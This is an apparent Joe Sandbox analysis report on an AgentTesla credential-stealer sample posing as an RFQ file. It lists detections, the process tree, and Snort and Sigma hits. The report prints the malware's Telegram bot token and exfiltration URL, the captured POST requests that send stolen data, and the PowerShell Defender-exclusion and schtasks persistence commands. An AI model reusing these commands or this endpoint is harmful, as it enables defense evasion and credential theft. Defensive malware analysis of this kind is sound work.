Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RFQ-101432620247fl#U00e2#U00aexslx.exe

Overview

General Information

Sample name:RFQ-101432620247fl#U00e2#U00aexslx.exe
renamed because original name is a hash value
Original sample name:RFQ-101432620247flxslx.exe
Analysis ID:1445865
MD5:626130b6e15538c11f7c38c2fe4a6039
SHA1:706ca5ac781496076d1604536b9ce10ac1f62ee1
SHA256:b89d6be0bcfb915492beb7ae726f815dcf289a284e650c200bda4faf5db60fa1
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected Telegram RAT
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to log keystrokes (.Net Source)
Initial sample is a PE file and has a suspicious name
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • RFQ-101432620247fl#U00e2#U00aexslx.exe (PID: 3964 cmdline: "C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe" MD5: 626130B6E15538C11F7C38C2FE4A6039)
    • powershell.exe (PID: 6300 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2504 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ywKDUBCUA.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7176 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 4284 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ywKDUBCUA" /XML "C:\Users\user\AppData\Local\Temp\tmp9347.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 1308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • ywKDUBCUA.exe (PID: 2260 cmdline: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe MD5: 626130B6E15538C11F7C38C2FE4A6039)
    • schtasks.exe (PID: 7372 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ywKDUBCUA" /XML "C:\Users\user\AppData\Local\Temp\tmpA374.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • ywKDUBCUA.exe (PID: 7424 cmdline: "C:\Users\user\AppData\Roaming\ywKDUBCUA.exe" MD5: 626130B6E15538C11F7C38C2FE4A6039)
    • ywKDUBCUA.exe (PID: 7440 cmdline: "C:\Users\user\AppData\Roaming\ywKDUBCUA.exe" MD5: 626130B6E15538C11F7C38C2FE4A6039)
    • ywKDUBCUA.exe (PID: 7448 cmdline: "C:\Users\user\AppData\Roaming\ywKDUBCUA.exe" MD5: 626130B6E15538C11F7C38C2FE4A6039)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7156462915:AAE3EIUy20eRSFdNZcqhQa0y1tAvt8IT_oY/sendMessage"}

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot7156462915:AAE3EIUy20eRSFdNZcqhQa0y1tAvt8IT_oY/sendMessage?chat_id=7062075018"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000000A.00000002.2104193964.00000000043B1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      0000000A.00000002.2104193964.00000000043B1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        0000000A.00000002.2104193964.00000000043B1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          00000009.00000002.3268439480.0000000003262000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            00000010.00000002.3268715008.0000000002D02000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              Click to see the 30 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3bdb0e8.3.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3bdb0e8.3.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3bdb0e8.3.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                    0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3bdb0e8.3.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                    • 0x316f2:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                    • 0x31764:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                    • 0x317ee:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                    • 0x31880:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                    • 0x318ea:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                    • 0x3195c:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                    • 0x319f2:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                    • 0x31a82:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                    10.2.ywKDUBCUA.exe.43ebdd0.5.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                      Click to see the 32 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe", ParentImage: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe, ParentProcessId: 3964, ParentProcessName: RFQ-101432620247fl#U00e2#U00aexslx.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe", ProcessId: 6300, ProcessName: powershell.exe
                      Sigma detected: Powershell Defender Exclusion
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe", ParentImage: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe, ParentProcessId: 3964, ParentProcessName: RFQ-101432620247fl#U00e2#U00aexslx.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe", ProcessId: 6300, ProcessName: powershell.exe
                      Sigma detected: Suspicious Add Scheduled Task Parent
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ywKDUBCUA" /XML "C:\Users\user\AppData\Local\Temp\tmpA374.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ywKDUBCUA" /XML "C:\Users\user\AppData\Local\Temp\tmpA374.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe, ParentImage: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe, ParentProcessId: 2260, ParentProcessName: ywKDUBCUA.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ywKDUBCUA" /XML "C:\Users\user\AppData\Local\Temp\tmpA374.tmp", ProcessId: 7372, ProcessName: schtasks.exe
                      Sigma detected: Suspicious Schtasks From Env Var Folder
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ywKDUBCUA" /XML "C:\Users\user\AppData\Local\Temp\tmp9347.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ywKDUBCUA" /XML "C:\Users\user\AppData\Local\Temp\tmp9347.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe", ParentImage: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe, ParentProcessId: 3964, ParentProcessName: RFQ-101432620247fl#U00e2#U00aexslx.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ywKDUBCUA" /XML "C:\Users\user\AppData\Local\Temp\tmp9347.tmp", ProcessId: 4284, ProcessName: schtasks.exe
                      Sigma detected: Non Interactive PowerShell Process Spawned
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe", ParentImage: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe, ParentProcessId: 3964, ParentProcessName: RFQ-101432620247fl#U00e2#U00aexslx.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe", ProcessId: 6300, ProcessName: powershell.exe

                      Persistence and Installation Behavior

                      barindex
                      Sigma detected: Scheduled temp file as task from temp location
                      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ywKDUBCUA" /XML "C:\Users\user\AppData\Local\Temp\tmp9347.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ywKDUBCUA" /XML "C:\Users\user\AppData\Local\Temp\tmp9347.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe", ParentImage: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe, ParentProcessId: 3964, ParentProcessName: RFQ-101432620247fl#U00e2#U00aexslx.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ywKDUBCUA" /XML "C:\Users\user\AppData\Local\Temp\tmp9347.tmp", ProcessId: 4284, ProcessName: schtasks.exe

                      Snort Signatures

                      Timestamp:05/22/24-17:27:00.989462
                      SID:2851779
                      Source Port:49712
                      Destination Port:443
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:05/22/24-17:26:58.094926
                      SID:2851779
                      Source Port:49709
                      Destination Port:443
                      Protocol:TCP
                      Classtype:A Network Trojan was detected

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus / Scanner detection for submitted sample
                      Source: RFQ-101432620247fl#U00e2#U00aexslx.exeAvira: detected
                      Antivirus detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeAvira: detection malicious, Label: TR/AVI.PWS.Agent.apilj
                      Found malware configuration
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3ba04c8.5.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot7156462915:AAE3EIUy20eRSFdNZcqhQa0y1tAvt8IT_oY/sendMessage?chat_id=7062075018"}
                      Source: ywKDUBCUA.exe.2260.10.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7156462915:AAE3EIUy20eRSFdNZcqhQa0y1tAvt8IT_oY/sendMessage"}
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeReversingLabs: Detection: 83%
                      Multi AV Scanner detection for submitted file
                      Source: RFQ-101432620247fl#U00e2#U00aexslx.exeReversingLabs: Detection: 83%
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Machine Learning detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeJoe Sandbox ML: detected
                      Machine Learning detection for sample
                      Source: RFQ-101432620247fl#U00e2#U00aexslx.exeJoe Sandbox ML: detected
                      Source: RFQ-101432620247fl#U00e2#U00aexslx.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49709 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49712 version: TLS 1.2
                      Source: RFQ-101432620247fl#U00e2#U00aexslx.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeCode function: 4x nop then jmp 048C3FC9h0_2_048C38A3
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeCode function: 4x nop then jmp 050D31F1h10_2_050D2ACB

                      Networking

                      barindex
                      Snort IDS alert for network traffic
                      Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.5:49709 -> 149.154.167.220:443
                      Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.5:49712 -> 149.154.167.220:443
                      Uses the Telegram API (likely for C&C communication)
                      Source: unknownDNS query: name: api.telegram.org
                      Yara detected Generic Downloader
                      Source: Yara matchFile source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3bdb0e8.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3ba04c8.5.raw.unpack, type: UNPACKEDPE
                      Source: global trafficHTTP traffic detected: POST /bot7156462915:AAE3EIUy20eRSFdNZcqhQa0y1tAvt8IT_oY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc7a52168f7017Host: api.telegram.orgContent-Length: 918Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7156462915:AAE3EIUy20eRSFdNZcqhQa0y1tAvt8IT_oY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc7a521867a3caHost: api.telegram.orgContent-Length: 918Expect: 100-continueConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                      Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                      Source: unknownHTTP traffic detected: POST /bot7156462915:AAE3EIUy20eRSFdNZcqhQa0y1tAvt8IT_oY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc7a52168f7017Host: api.telegram.orgContent-Length: 918Expect: 100-continueConnection: Keep-Alive
                      Source: RFQ-101432620247fl#U00e2#U00aexslx.exe, 00000009.00000002.3268439480.000000000327D000.00000004.00000800.00020000.00000000.sdmp, ywKDUBCUA.exe, 00000010.00000002.3268715008.0000000002D1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                      Source: RFQ-101432620247fl#U00e2#U00aexslx.exe, ywKDUBCUA.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                      Source: RFQ-101432620247fl#U00e2#U00aexslx.exe, ywKDUBCUA.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                      Source: RFQ-101432620247fl#U00e2#U00aexslx.exe, ywKDUBCUA.exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
                      Source: RFQ-101432620247fl#U00e2#U00aexslx.exe, 00000000.00000002.2063886948.00000000028CA000.00000004.00000800.00020000.00000000.sdmp, RFQ-101432620247fl#U00e2#U00aexslx.exe, 00000009.00000002.3268439480.000000000326A000.00000004.00000800.00020000.00000000.sdmp, ywKDUBCUA.exe, 0000000A.00000002.2102960401.00000000030DA000.00000004.00000800.00020000.00000000.sdmp, ywKDUBCUA.exe, 00000010.00000002.3268715008.0000000002D0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: RFQ-101432620247fl#U00e2#U00aexslx.exe, 00000000.00000002.2064422472.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp, RFQ-101432620247fl#U00e2#U00aexslx.exe, 00000000.00000002.2064422472.00000000044C2000.00000004.00000800.00020000.00000000.sdmp, ywKDUBCUA.exe, 0000000A.00000002.2104193964.00000000043B1000.00000004.00000800.00020000.00000000.sdmp, ywKDUBCUA.exe, 00000010.00000002.3264244060.0000000000436000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                      Source: RFQ-101432620247fl#U00e2#U00aexslx.exe, 00000009.00000002.3268439480.000000000326A000.00000004.00000800.00020000.00000000.sdmp, ywKDUBCUA.exe, 00000010.00000002.3268715008.0000000002D0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                      Source: RFQ-101432620247fl#U00e2#U00aexslx.exe, 00000000.00000002.2064422472.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp, RFQ-101432620247fl#U00e2#U00aexslx.exe, 00000000.00000002.2064422472.00000000044C2000.00000004.00000800.00020000.00000000.sdmp, RFQ-101432620247fl#U00e2#U00aexslx.exe, 00000009.00000002.3268439480.0000000003211000.00000004.00000800.00020000.00000000.sdmp, ywKDUBCUA.exe, 0000000A.00000002.2104193964.00000000043B1000.00000004.00000800.00020000.00000000.sdmp, ywKDUBCUA.exe, 00000010.00000002.3264244060.0000000000434000.00000040.00000400.00020000.00000000.sdmp, ywKDUBCUA.exe, 00000010.00000002.3268715008.0000000002CB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7156462915:AAE3EIUy20eRSFdNZcqhQa0y1tAvt8IT_oY/
                      Source: RFQ-101432620247fl#U00e2#U00aexslx.exe, 00000009.00000002.3268439480.0000000003266000.00000004.00000800.00020000.00000000.sdmp, ywKDUBCUA.exe, 00000010.00000002.3268715008.0000000002D06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7156462915:AAE3EIUy20eRSFdNZcqhQa0y1tAvt8IT_oY/sendDocument
                      Source: RFQ-101432620247fl#U00e2#U00aexslx.exe, ywKDUBCUA.exe.0.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49709 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49712 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Contains functionality to log keystrokes (.Net Source)
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3ba04c8.5.raw.unpack, NDL2m67zO.cs.Net Code: tmyAmPp
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3bdb0e8.3.raw.unpack, NDL2m67zO.cs.Net Code: tmyAmPp
                      Installs a global keyboard hook
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\ywKDUBCUA.exe
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeWindow created: window name: CLIPBRDWNDCLASS

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3bdb0e8.3.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 10.2.ywKDUBCUA.exe.43ebdd0.5.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3ba04c8.5.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 10.2.ywKDUBCUA.exe.43b11b0.3.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 10.2.ywKDUBCUA.exe.43ebdd0.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 10.2.ywKDUBCUA.exe.43b11b0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3bdb0e8.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3ba04c8.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Initial sample is a PE file and has a suspicious name
                      Source: initial sampleStatic PE information: Filename: RFQ-101432620247fl#U00e2#U00aexslx.exe
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeCode function: 0_2_00E9DE8C0_2_00E9DE8C
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeCode function: 0_2_048C33600_2_048C3360
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeCode function: 0_2_048C33500_2_048C3350
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeCode function: 0_2_048C08C00_2_048C08C0
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeCode function: 0_2_048C58F80_2_048C58F8
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeCode function: 0_2_06BF74580_2_06BF7458
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeCode function: 0_2_06BF52300_2_06BF5230
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeCode function: 0_2_06BF21060_2_06BF2106
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeCode function: 0_2_06BF74490_2_06BF7449
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeCode function: 0_2_06BFE5700_2_06BFE570
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeCode function: 0_2_06BF521F0_2_06BF521F
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeCode function: 0_2_06BFE1380_2_06BFE138
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeCode function: 0_2_06BF2DD80_2_06BF2DD8
